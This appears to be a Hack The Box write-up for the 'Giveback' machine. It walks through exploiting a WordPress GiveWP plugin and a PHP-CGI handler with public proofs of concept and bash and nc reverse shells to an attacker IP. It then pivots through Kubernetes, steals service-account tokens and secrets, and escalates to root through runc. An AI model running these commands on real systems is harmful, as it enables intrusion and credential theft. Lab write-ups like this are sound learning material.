HTB Linux Medium: Giveback
Giveback is a Medium rated Linux machine on HTB.
HTB Linux Medium: Giveback
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
Nmap scan report for 10.129.220.34
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_ 256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp open http nginx 1.28.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 6.8.1
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI
|_http-server-header: nginx/1.28.0
30686/tcp open http Golang net/http server
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 200 OK
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Load-Balancing-Endpoint-Weight: 1
| Date: Sat, 01 Nov 2025 19:22:58 GMT
| Content-Length: 127
| "service": {
| "namespace": "default",
| "name": "wp-nginx-service"
| "localEndpoints": 1,
| "serviceProxyHealthy": true
| GenericLines, Help, LPDString, RTSPRequest, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
Enumerate HTTP (Port 80)
The website appears to be running Wordpress. Enumerate plugins using wpscan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
wpscan --url http://10.129.220.34/
[+] give
| Location: http://10.129.220.34/wp-content/plugins/give/
| Last Updated: 2025-10-29T20:17:00.000Z
| [!] The version is out of date, the latest version is 4.12.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By:
| Urls In 404 Page (Passive Detection)
| Meta Tag (Passive Detection)
| Javascript Var (Passive Detection)
|
| Version: 3.14.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://10.129.220.34/wp-content/plugins/give/assets/dist/css/give.css?ver=3.14.0
| Confirmed By:
| Meta Tag (Passive Detection)
| - http://10.129.220.34/, Match: 'Give v3.14.0'
| Javascript Var (Passive Detection)
| - http://10.129.220.34/, Match: '"1","give_version":"3.14.0","magnific_options"'
We find the following PoC which allows us to get RCE: Link. The endpoint must point to a donation. The default donation link was used.
1
2
3
4
5
6
7
8
# Download
cd /tmp
git clone https://github.com/EQSTLab/CVE-2024-5932.git
cd CVE-2024-5932
pip3 install -r requirements.txt --break-system-packages
# Usage
python3 CVE-2024-5932-rce.py -u http://10.129.220.34/donations/the-things-we-need/ -c "<command>"
To get a reverse shell, the following bash reverse shell was used:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Start nc listener
nc -lnvp 80
# Trigger reverse shell
python3 CVE-2024-5932-rce.py -u http://10.129.220.34/donations/the-things-we-need/ -c "bash -c 'bash -i >& /dev/tcp/10.10.14.78/80 0>&1'"
# Shell
nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.78] from (UNKNOWN) [10.129.220.34] 36727
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
<-6d659d8787-npjl8:/opt/bitnami/wordpress/wp-admin$ id
uid=1001 gid=0(root) groups=0(root),1001
Stabilize the shell:
1
script -qc /bin/bash /dev/null
Enumeration
Found passwords inside the /secrets directory:
1
2
3
4
5
6
7
8
# Mariadb
sW5sp4spa3u7RLyetrekE4oS
# Mariadb root
sW5sp4syetre32828383kE4oS
# Wordpress
O8F7KR5zGi
Found an interesting environment variable that links to a “legacy intranet service”:
1
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
Pivot
Use Ligolo to pivot to the other kubernetes pods. Curl & wget aren’t available, use perl instead!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# Kali
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
cd /opt/tools/linux
sudo ./ligolo-proxy -selfcert -laddr 0.0.0.0:443
sudo python3 -m http.server 80 # Transfer agent
# Target
perl -MHTTP::Tiny -e 'HTTP::Tiny->new->mirror("http://10.10.14.78/ligolo-agent", "ligolo-agent")'
chmod +x ligolo-agent
./ligolo-agent -connect 10.10.14.78:443 -ignore-cert -retry
# In terminal
sudo ip route add 10.42.1.0/24 dev ligolo
sudo ip route add 10.43.0.0/16 dev ligolo
# In ligolo window
session <enter><enter>
start
We can now reach the legacy server on port 5000. The following information stands out:
1
2
3
<p>**SRE** - This system still includes legacy CGI support. Cluster misconfiguration may likely expose internal scripts.</p>
<li><a href="/cgi-bin/php-cgi">/cgi-bin/php-cgi</a> — PHP-CGI Handler</li>
Looking for a php cgi exploit we find the following PoC: Link
1
2
3
4
5
6
7
8
9
10
11
12
13
# Start nc listener
nc -lvnp 80
# Launch exploit
python3 watchTowr-vs-php_cve-2024-4577.py --target http://10.43.2.241:5000/cgi-bin/php-cgi -c "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.78 80 >/tmp/f"
# Shell
nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.78] from (UNKNOWN) [10.129.248.50] 57735
/bin/sh: can't access tty; job control turned off
/var/www/html/cgi-bin # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Enumeration
Inside the /run/secrets/kubernetes.io/serviceaccount directory we are able to extract all the necessary information to set up kubectl on our Kali machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/run/secrets/kubernetes.io/serviceaccount # cat ca.crt;echo
-----BEGIN CERTIFICATE-----
MIIBdzCCAR2gAwIBAgIBADAKBggqhkjOPQQDAjAjMSEwHwYDVQQDDBhrM3Mtc2Vy
dmVyLWNhQDE3MjY5Mjc3MjMwHhcNMjQwOTIxMTQwODQzWhcNMzQwOTE5MTQwODQz
WjAjMSEwHwYDVQQDDBhrM3Mtc2VydmVyLWNhQDE3MjY5Mjc3MjMwWTATBgcqhkjO
PQIBBggqhkjOPQMBBwNCAATWYWOnIUmDn8DGHOdKLjrOZ36gSUMVrnqqf6YJsvpk
9QbgzGNFzYcwDZxmZtJayTbUrFFjgSydDNGuW/AkEnQ+o0IwQDAOBgNVHQ8BAf8E
BAMCAqQwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUtCpVDbK3XnBv3N3BKuXy
Yd0zeicwCgYIKoZIzj0EAwIDSAAwRQIgOsFo4UipeXPiEXvlGH06fja8k46ytB45
cd0d39uShuQCIQDMgaSW8nrpMfNExuGLMZhcsVrUr5XXN8F5b/zYi5snkQ==
-----END CERTIFICATE-----
/run/secrets/kubernetes.io/serviceaccount # cat namespace;echo
default
/run/secrets/kubernetes.io/serviceaccount # cat token;echo
eyJhbGciOiJSUzI1NiIsImtpZCI6Inp3THEyYUhkb19sV3VBcGFfdTBQa1c1S041TkNiRXpYRS11S0JqMlJYWjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzkzNjA2NDk3LCJpYXQiOjE3NjIwNzA0OTcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYTBjYmZkNmEtNDAxNC00ZTE1LWI2MDgtMTkzOTM2YjM1MDMwIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiZ2l2ZWJhY2suaHRiIiwidWlkIjoiMTJhOGE5Y2YtYzM1Yi00MWYzLWIzNWEtNDJjMjYyZTQzMDQ2In0sInBvZCI6eyJuYW1lIjoibGVnYWN5LWludHJhbmV0LWNtcy02ZjdiZjVkYjg0LWxmdzdsIiwidWlkIjoiMzM3ODUxY2QtYTM2NS00NmU2LTk4MDAtZTJhYzdlMWUyZmIyIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJzZWNyZXQtcmVhZGVyLXNhIiwidWlkIjoiNzJjM2YwYTUtOWIwOC00MzhhLWEzMDctYjYwODc0NjM1YTlhIn0sIndhcm5hZnRlciI6MTc2MjA3NDEwNH0sIm5iZiI6MTc2MjA3MDQ5Nywic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6c2VjcmV0LXJlYWRlci1zYSJ9.FRSjGc-ufh-Sk77UlLUICOqBhr7SS-LwQm5pAP616sFwAQzoeUh1a7pJaI_WN-TBDS1wbSzva_BRx7K6MS3kSaDOTwYymFiU6zxqqUJKXJM1suHvdJIfh__bV-Ri_a8Fm7bIw1o3Kglb1joeJNK4yVdJPXXJQQxwBEl4CQ3skY6Kn2qhLuiI75TL8Im9po1nOYd2-S04k7_0PHo4n4T_5gGkgXEaSWYKSO6xjc3fi68vzt1hKrp8ENhlN33KaznDp4vmU7iHABPuq-bq06xukA4EKlOIbywtuY-5w00spWD7Isi8IZ-Ji0uVBuEJItG8lAWxEO7S24osgJuMFRtFdw
Kubectl
Configure Kubectl:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
sudo apt install kubectl
# config
apiVersion: v1
clusters:
- cluster:
certificate-authority: /home/kali/ca.crt
server: https://10.43.0.1:443
name: my-cluster
contexts:
- context:
cluster: my-cluster
user: serviceaccount
name: my-context
current-context: my-context
users:
- name: serviceaccount
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6Inp3THEyYUhkb19sV3VBcGFfdTBQa1c1S041TkNiRXpYRS11S0JqMlJYWjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzkzNjA2NDk3LCJpYXQiOjE3NjIwNzA0OTcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYTBjYmZkNmEtNDAxNC00ZTE1LWI2MDgtMTkzOTM2YjM1MDMwIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiZ2l2ZWJhY2suaHRiIiwidWlkIjoiMTJhOGE5Y2YtYzM1Yi00MWYzLWIzNWEtNDJjMjYyZTQzMDQ2In0sInBvZCI6eyJuYW1lIjoibGVnYWN5LWludHJhbmV0LWNtcy02ZjdiZjVkYjg0LWxmdzdsIiwidWlkIjoiMzM3ODUxY2QtYTM2NS00NmU2LTk4MDAtZTJhYzdlMWUyZmIyIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJzZWNyZXQtcmVhZGVyLXNhIiwidWlkIjoiNzJjM2YwYTUtOWIwOC00MzhhLWEzMDctYjYwODc0NjM1YTlhIn0sIndhcm5hZnRlciI6MTc2MjA3NDEwNH0sIm5iZiI6MTc2MjA3MDQ5Nywic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6c2VjcmV0LXJlYWRlci1zYSJ9.FRSjGc-ufh-Sk77UlLUICOqBhr7SS-LwQm5pAP616sFwAQzoeUh1a7pJaI_WN-TBDS1wbSzva_BRx7K6MS3kSaDOTwYymFiU6zxqqUJKXJM1suHvdJIfh__bV-Ri_a8Fm7bIw1o3Kglb1joeJNK4yVdJPXXJQQxwBEl4CQ3skY6Kn2qhLuiI75TL8Im9po1nOYd2-S04k7_0PHo4n4T_5gGkgXEaSWYKSO6xjc3fi68vzt1hKrp8ENhlN33KaznDp4vmU7iHABPuq-bq06xukA4EKlOIbywtuY-5w00spWD7Isi8IZ-Ji0uVBuEJItG8lAWxEO7S24osgJuMFRtFdw
# Add config file to environment variable
export KUBECONFIG=/home/kali/config
We are now able to list the secrets:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
kubectl get secrets
NAME TYPE DATA AGE
beta-vino-wp-mariadb Opaque 2 406d
beta-vino-wp-wordpress Opaque 1 406d
sh.helm.release.v1.beta-vino-wp.v58 helm.sh/release.v1 1 64d
sh.helm.release.v1.beta-vino-wp.v59 helm.sh/release.v1 1 64d
sh.helm.release.v1.beta-vino-wp.v60 helm.sh/release.v1 1 63d
sh.helm.release.v1.beta-vino-wp.v61 helm.sh/release.v1 1 63d
sh.helm.release.v1.beta-vino-wp.v62 helm.sh/release.v1 1 63d
sh.helm.release.v1.beta-vino-wp.v63 helm.sh/release.v1 1 63d
sh.helm.release.v1.beta-vino-wp.v64 helm.sh/release.v1 1 63d
sh.helm.release.v1.beta-vino-wp.v65 helm.sh/release.v1 1 63d
sh.helm.release.v1.beta-vino-wp.v66 helm.sh/release.v1 1 38d
sh.helm.release.v1.beta-vino-wp.v67 helm.sh/release.v1 1 38d
user-secret-babywyrm Opaque 1 160m
SSH as babywyrm
Get the masterpass for the babywyrm user:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
kubectl get secrets user-secret-babywyrm -o json
{
"apiVersion": "v1",
"data": {
"MASTERPASS": "bDdMbHJIakJuaFdhMVhzTEMxa2M1MlNRSUdUU2N0bXg="
},
"kind": "Secret",
"metadata": {
"creationTimestamp": "2025-11-02T05:36:39Z",
"name": "user-secret-babywyrm",
"namespace": "default",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"controller": true,
"kind": "SealedSecret",
"name": "user-secret-babywyrm",
"uid": "1d82cb02-72cc-4e1c-b769-98f653245a41"
}
],
"resourceVersion": "2856264",
"uid": "2e3bc0ea-b483-425d-9f85-17f9f5ed1295"
},
"type": "Opaque"
}
The password appears to be base64 encoded, base64 decode it:
1
2
echo -n "bDdMbHJIakJuaFdhMVhzTEMxa2M1MlNRSUdUU2N0bXg=" |base64 -d
l7LlrHjBnhWa1XsLC1kc52SQIGTSctmx
We can now SSH as the babywyrm user:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
ssh babywyrm@10.129.248.50
babywyrm@10.129.248.50's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-124-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Sun Nov 2 08:18:16 2025 from 10.10.14.78
babywyrm@giveback:~$
User.txt: c13e54040afe94002e767cabe6bd1fcb
1
2
cat user.txt
c13e54040afe94002e767cabe6bd1fcb
Privilege Escalation
There is a binary that we can execute with sudo permissions:
1
2
3
4
5
6
7
sudo -l
Matching Defaults entries for babywyrm on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0, timestamp_timeout=20
User babywyrm may run the following commands on localhost:
(ALL) NOPASSWD: !ALL
(ALL) /opt/debug
The first password we must enter is the one previously found to SSH. Next a “Administrative password” is required. This password matches the one obtained from the mariadb-password returned by kubectl:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
kubectl get secrets beta-vino-wp-mariadb -o json
{
"apiVersion": "v1",
"data": {
"mariadb-password": "c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T",
"mariadb-root-password": "c1c1c3A0c3lldHJlMzI4MjgzODNrRTRvUw=="
},
"kind": "Secret",
"metadata": {
"annotations": {
"meta.helm.sh/release-name": "beta-vino-wp",
"meta.helm.sh/release-namespace": "default"
},
"creationTimestamp": "2024-09-21T22:17:31Z",
"labels": {
"app.kubernetes.io/instance": "beta-vino-wp",
"app.kubernetes.io/managed-by": "Helm",
"app.kubernetes.io/name": "mariadb",
"app.kubernetes.io/part-of": "mariadb",
"app.kubernetes.io/version": "11.8.2",
"helm.sh/chart": "mariadb-21.0.0"
},
"name": "beta-vino-wp-mariadb",
"namespace": "default",
"resourceVersion": "2088227",
"uid": "3473d5ec-b774-40c9-a249-81d51426a45e"
},
"type": "Opaque"
}
Use the password on the debug binary:
1
2
3
4
5
6
7
8
# Pass: c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T
sudo /opt/debug
Validating sudo...
Please enter the administrative password:
Both passwords verified. Executing the command...
NAME:
runc - Open Container Initiative runtime
Since the debug binary appears to be runc, we can use the following guide to elevate to a root shell: Link
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
# Pass: c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T
sudo /opt/debug spec
# Modify the "mounts" section in the config.json file
{
"ociVersion": "1.0.2-dev",
"process": {
"terminal": true,
"user": {
"uid": 0,
"gid": 0
},
"args": [
"sh"
],
"env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm"
],
"cwd": "/",
"capabilities": {
"bounding": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE"
],
"effective": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE"
],
"permitted": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE"
],
"ambient": [
"CAP_AUDIT_WRITE",
"CAP_KILL",
"CAP_NET_BIND_SERVICE"
]
},
"rlimits": [
{
"type": "RLIMIT_NOFILE",
"hard": 1024,
"soft": 1024
}
],
"noNewPrivileges": true
},
"root": {
"path": "rootfs",
"readonly": true
},
"hostname": "runc",
"mounts": [
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},
{
"destination": "/proc",
"type": "proc",
"source": "proc"
},
{
"destination": "/dev",
"type": "tmpfs",
"source": "tmpfs",
"options": [
"nosuid",
"strictatime",
"mode=755",
"size=65536k"
]
},
{
"destination": "/dev/pts",
"type": "devpts",
"source": "devpts",
"options": [
"nosuid",
"noexec",
"newinstance",
"ptmxmode=0666",
"mode=0620",
"gid=5"
]
},
{
"destination": "/dev/shm",
"type": "tmpfs",
"source": "shm",
"options": [
"nosuid",
"noexec",
"nodev",
"mode=1777",
"size=65536k"
]
},
{
"destination": "/dev/mqueue",
"type": "mqueue",
"source": "mqueue",
"options": [
"nosuid",
"noexec",
"nodev"
]
},
{
"destination": "/sys",
"type": "sysfs",
"source": "sysfs",
"options": [
"nosuid",
"noexec",
"nodev",
"ro"
]
},
{
"destination": "/sys/fs/cgroup",
"type": "cgroup",
"source": "cgroup",
"options": [
"nosuid",
"noexec",
"nodev",
"relatime",
"ro"
]
}
],
"linux": {
"resources": {
"devices": [
{
"allow": false,
"access": "rwm"
}
]
},
"namespaces": [
{
"type": "pid"
},
{
"type": "network"
},
{
"type": "ipc"
},
{
"type": "uts"
},
{
"type": "mount"
},
{
"type": "cgroup"
}
],
"maskedPaths": [
"/proc/acpi",
"/proc/asound",
"/proc/kcore",
"/proc/keys",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/timer_stats",
"/proc/sched_debug",
"/sys/firmware",
"/proc/scsi"
],
"readonlyPaths": [
"/proc/bus",
"/proc/fs",
"/proc/irq",
"/proc/sys",
"/proc/sysrq-trigger"
]
}
}
# Add config to other dir since original file is not writable:
mkdir /tmp/test
cd /tmp/test
vi config.json
# In the same directory
mkdir rootfs
# Shell as root:
sudo /opt/debug run demo
Validating sudo...
Please enter the administrative password:
Both passwords verified. Executing the command...
# id
uid=0(root) gid=0(root) groups=0(root)
Root.txt: 54a65d1a7ae796e97e49fe75e3210970
1
2
# cat root.txt
54a65d1a7ae796e97e49fe75e3210970
PWNED!!!
This post is licensed under CC BY 4.0 by the author.